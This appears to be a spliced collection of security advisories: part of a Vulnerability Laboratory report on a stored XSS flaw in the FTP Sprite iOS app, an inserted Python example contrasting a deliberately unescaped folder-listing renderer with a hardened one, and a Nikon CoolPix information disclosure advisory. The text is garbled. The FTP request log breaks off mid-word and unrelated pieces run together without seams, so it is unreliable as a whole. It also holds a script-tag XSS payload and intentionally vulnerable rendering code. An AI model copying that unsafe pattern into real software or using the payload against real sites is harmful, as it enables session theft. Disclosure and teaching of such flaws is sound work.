** Http File Sharing via WiFi, Support Safari, chrome, firefox and IE6/7/8/9
** Chrome and Firefox Supported upload multiple files
** Email multiple files/folder Supported
** Open files using other applications
** Local File Manage **
** New Folder
** Sorting by file name, create date and file type
** View, copy, move, delete, rename, email, zip Compression and unzip files/folders
** Glide deleting function
** Select all and Cancel all
** Photo import Supported
** Bookmark supported
** File View **
** New plain text (default encoding UTF-8), Convert plain file encoding (Unicode, UTF-8 etc) [.txt]
** External file content copy or paste
** Photo View, Zoom [.png .jpg .jpeg .gif .bmp .xbm .tif .tiff etc]
** Document reader [.pdf .rtf .csv .rtfd .doc .docx .xls .xlsx .ppt .pptx (office 2003 or later) etc]
** Video Player [.mp4]
** File Compression and Decompression [.zip .rar]
** Extract files from encryption .rar
** Multi-touch Supported, Zoom files
** Landscape mode supported
** iPad-compatible

(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/ftp-sprite+/id480523641 )

Abstract:
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the FTP Sprite 1.2.1 application (Apple iOS - iPad & iPhone).
Report-Timeline: 2013-07-12:Public Disclosure (Vulnerability Laboratory) Status: Published Affected Products: == Apple AppStore Product: FTP Sprite - Application 1.2.1 Exploitation-Technique: === Remote Severity: = Medium Details: A persistent input validation web vulnerability is detected in the FTP Sprite 1.2.1 application (Apple iOS - iPad & iPhone). The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the app. The vulnerability is located in the index file dir listing module of the web-server (http://localhost:41495) when processing to display via POST request method injected manipulated `folder names`. The persistent script code will be executed in the main index file dir listing module when the service lists the new malicious injected foldername as item. Exploitation of the persistent web vulnerability requires low or medium user interaction without application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation. Vulnerable Application(s): [+] FTP Sprite v1.2.1 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Add Folder Vulnerable Parameter(s): [+] foldername Affected Module(s): [+] Index Folder Listing Proof of Concept: = The persistent input validation web vulnerability can be exploited by remote attackers without privilege application user account and with low user interaction. For demonstration or reproduce ... 
PoC: Add Folder - (Name)

0%
Name    Size    Modified Date    Delete
        2013-07-11 20:14:33

--- Request Session Log ---
Status: 200[OK]
POST http://192.168.2.104:41495/?type=createdir&guid=EFB7891B-84ED-4C48-A404-95960BBB95D0
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ]
Content Size[506]
Mime Type[text/plain]

Request Headers:
Host[192.168.2.104:41495]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[text/html, */*; q=0.01]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://192.168.2.104:41495/?guid=EFB7891B-84ED-4C48-A404-95960BBB95D0&type=child&date=Thu%20Jul%2011%202013%2020:05:48%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:06:26%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:07:33%20GMT+0200]
Content-Length[87]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]

Post Da
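The following is an added example, not code from the FTP Sprite app or from the Vulnerability Lab advisory. It models the pattern the advisory describes: an unauthenticated POST to the `type=createdir` action supplies a `foldername`, the value is stored, and the index listing later renders it into HTML without output encoding. Beside the vulnerable rendering it shows the hardened form (input validation on the Add Folder module plus context-appropriate output encoding in the listing). The HTML layout, the helper names, the timestamp and the sample folder names are assumptions; only the `createdir` action and the `foldername` parameter come from the advisory.

```python
"""Stored XSS through a folder name in a web-based directory listing.

Added example modelled on the FTP Sprite advisory; not the app's own code.
Assumed: the exact HTML the app emits, the helper names below, and that a
folder name is stored verbatim from the `foldername` POST parameter.
"""
import html
import re
from urllib.parse import parse_qs, quote

# Conservative whitelist for folder names (assumption: the app imposes no
# such rule).  Rejects markup and URL metacharacters; "." / ".." are
# rejected separately below.
FOLDER_NAME_RE = re.compile(r"^[A-Za-z0-9 ._-]{1,64}$")


def parse_createdir_body(body: str) -> str:
    """Pull `foldername` out of an application/x-www-form-urlencoded body."""
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get("foldername")
    if not values:
        raise ValueError("missing foldername parameter")
    return values[0]


def is_valid_folder_name(name: str) -> bool:
    """Input validation for the Add Folder module (assumed rule set)."""
    return bool(FOLDER_NAME_RE.match(name)) and name.strip(" .") != ""


def render_listing_vulnerable(folders):
    """Index listing as the advisory describes it: the stored folder name is
    concatenated straight into the markup, so whatever the creator typed
    becomes part of the page for every later visitor of the listing."""
    rows = []
    for name, mtime in folders:
        rows.append(
            f'<tr><td><a href="?type=child&name={name}">{name}</a></td>'
            f"<td>{mtime}</td></tr>"
        )
    return "<table>" + "".join(rows) + "</table>"


def render_listing_hardened(folders):
    """Same listing with output encoding matched to each context: the text
    node and the attribute value are HTML-escaped, and the name inside the
    URL is percent-encoded so it cannot add or alter query parameters."""
    rows = []
    for name, mtime in folders:
        text = html.escape(name, quote=True)
        href = "?type=child&name=" + quote(name, safe="")
        rows.append(
            f'<tr><td><a href="{html.escape(href, quote=True)}">{text}</a></td>'
            f"<td>{html.escape(str(mtime))}</td></tr>"
        )
    return "<table>" + "".join(rows) + "</table>"


def handle_createdir(body: str, store: list, validate: bool = True):
    """Server side of the createdir action.  Returns (status, message).
    validate=False mimics the vulnerable app and accepts any name;
    validate=True rejects names that fail the whitelist."""
    try:
        name = parse_createdir_body(body)
    except ValueError as exc:
        return 400, str(exc)
    if validate and not is_valid_folder_name(name):
        return 400, "invalid folder name"
    store.append((name, "2013-07-11 20:14:33"))  # constructed timestamp
    return 200, "created"


def demo():
    """Constructed request body carrying a script tag as the folder name."""
    body = "foldername=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
    vulnerable_store, hardened_store = [], []
    handle_createdir(body, vulnerable_store, validate=False)
    handle_createdir(body, hardened_store, validate=True)
    return {
        "name": parse_createdir_body(body),
        "vulnerable_html": render_listing_vulnerable(vulnerable_store),
        # Render the stored payload through the safe renderer as well, to
        # show that encoding alone already neutralises it.
        "hardened_html": render_listing_hardened(vulnerable_store),
        "hardened_store": hardened_store,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

Two layers are shown on purpose: the whitelist stops the payload from ever being stored, and the encoding in the renderer protects listings that already contain hostile names (for example folders created over FTP rather than through the web form), which is the layer that actually fixes the advisory's bug.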
Nikon CoolPix L Series Fw1.0 - Information Disclosure Issue
Title:
======
Nikon CoolPix L Series Fw1.0 - Information Disclosure Issue

Date:
=====
2013-07-16

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1014

VL-ID:
=====
1014

Common Vulnerability Scoring System:
====================================
3.5

Introduction:
=============
Attractive, sturdy and easy to use, the 16-megapixel COOLPIX L27 & L25 is clever with images, so you don't have to be. Simple controls and smart automatic technology deliver steady images and ensure you capture portraits with smiling faces and open eyes, through the NIKKOR wide-angle 5x optical zoom lens. A large 6.7-cm (2.7-in.) LCD screen displays images with superb clarity at any time of day or night, and you can switch to filming the action at the touch of a button, or set the camera to Easy Auto mode and capture photos without worrying about a thing.

(Copy of the Vendor Homepage: http://www.europe-nikon.com/en_GB/product/digital-cameras/coolpix/life/coolpix-l27 )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered an information disclosure issue in the Nikon CoolPix L25 digital camera with firmware 1.0.

Report-Timeline:
================
2013-07-16: Public Disclosure (Vulnerability Laboratory)

Status:
=======
Published

Affected Products:
==================
Nikon
Product: COOLPIX L25, L27 & L28

Exploitation-Technique:
=======================
Hardware

Severity:
=========
Medium

Details:
========
An information disclosure issue exists in Nikon's official COOLPIX L series cameras (L25, L28 and possibly others). The bug allows an attacker with physical access to the device to recover pictures of the previous owner, which can expose sensitive information about people, websites, servers or companies.

The privacy issue is located in the Menu > System module, in the function that saves a "Start Bild" (start picture) to be shown when the camera boots. A picture saved as the start picture is kept in the camera's internal storage and is not removed when the device is formatted or reset to firmware defaults. Anyone who later obtains the device can open the short review of the start picture and see images the previous owner had deleted.
The device does not recognize this and keeps the pictures stored with no possibility to delete them.

In a scenario on eBay we bought a Nikon camera from a private seller. He had used the camera for about two years for his holiday trips and conferences. He stated in a mail that the camera had been formatted and had received a firmware reset. When the camera arrived at our location we looked into the short review of the "Start Bild" (start picture) and saw several images of the owner.

Proof of Concept:
=================
The information disclosure issue can be reproduced by local attackers with physical access to the camera device.

Steps to reproduce ...
1. Start the Nikon L series camera
2. Switch to the camera screen mode and take a picture
3. Go to Menu > System > Start Bild
4. Choose your own picture and save it as the start picture
5. Shut the camera down the regular way and start it again after a few seconds
6. Your image is visible when the system boots
7. Go to Menu > System and format the device
8. Go to Menu > System again
9. After the format, reset the device
10. Shut the Nikon camera down and take out the SD card
11. Restart it, go to the menu and open the Start Bild (start picture) module
12. Your image is still visible even though a full hardware reset and format were performed
13. Information disclosure issue in the Nikon L series successfully reproduced!

Note: Once an image is saved in the camera as the start picture, no format and no firmware reset can remove it.

Solution:
=========
To fix the vulnerability, the firmware reset and the format must also remove all pictures from the start picture review menu.

Risk:
=====
The security risk of the information disclosure issue is estimated as medium(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty.
Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact:    ad...@vulnerabili